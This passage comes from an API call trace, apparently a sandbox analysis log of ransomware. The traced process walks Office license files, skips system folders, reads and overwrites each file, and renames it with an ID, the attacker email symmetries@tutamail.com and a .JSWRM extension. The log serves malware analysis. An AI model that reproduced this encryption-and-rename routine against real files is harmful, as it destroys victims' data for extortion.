hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.200] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea57d3ec, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea57d3ec, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea63c020, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", cAlternateFileName="PRB109~1.XRM")) returned 1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.200] lstrcmpiW (lpString1="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0109.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0109.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0109.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp5-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0109.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0109.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0109.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0109.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.201] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0109.201] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.201] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.204] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.204] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.204] CloseHandle (hObject=0x45c) returned 1 [0109.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0109.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0109.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0109.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0109.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0109.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0109.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.205] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp5-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp5-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0109.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0109.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0109.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.206] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea530ff3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea530ff3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea615dc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp6-pl.xrm-ms", cAlternateFileName="PR61C8~1.XRM")) returned 1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2=".") returned 1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="..") returned 1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="...") returned 1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="windows") returned -1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="recovery") returned -1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.206] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-pl.xrm-ms", lpString2="msocache") returned 1 [0109.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0109.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241060, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0109.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241358, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0109.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0109.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0109.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.207] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0109.207] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0109.207] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0109.209] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.209] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0109.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.210] CloseHandle (hObject=0x45c) returned 1 [0109.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0109.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0109.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0109.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.210] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0109.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0109.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0109.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0109.211] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea4e4aeb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea4e4aeb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea5efb78, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eef, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp6-ppd.xrm-ms", cAlternateFileName="PREF6C~1.XRM")) returned 1 [0109.211] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2=".") returned 1 [0109.211] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="..") returned 1 [0109.211] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="...") returned 1 [0109.211] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="windows") returned -1 [0109.211] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.211] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.211] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.212] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.212] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.212] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0109.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0109.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.213] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24303) returned 1 [0109.213] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0109.213] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.216] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.216] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.216] CloseHandle (hObject=0x45c) returned 1 [0109.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0109.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0109.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0109.216] RtlAllocateHeap 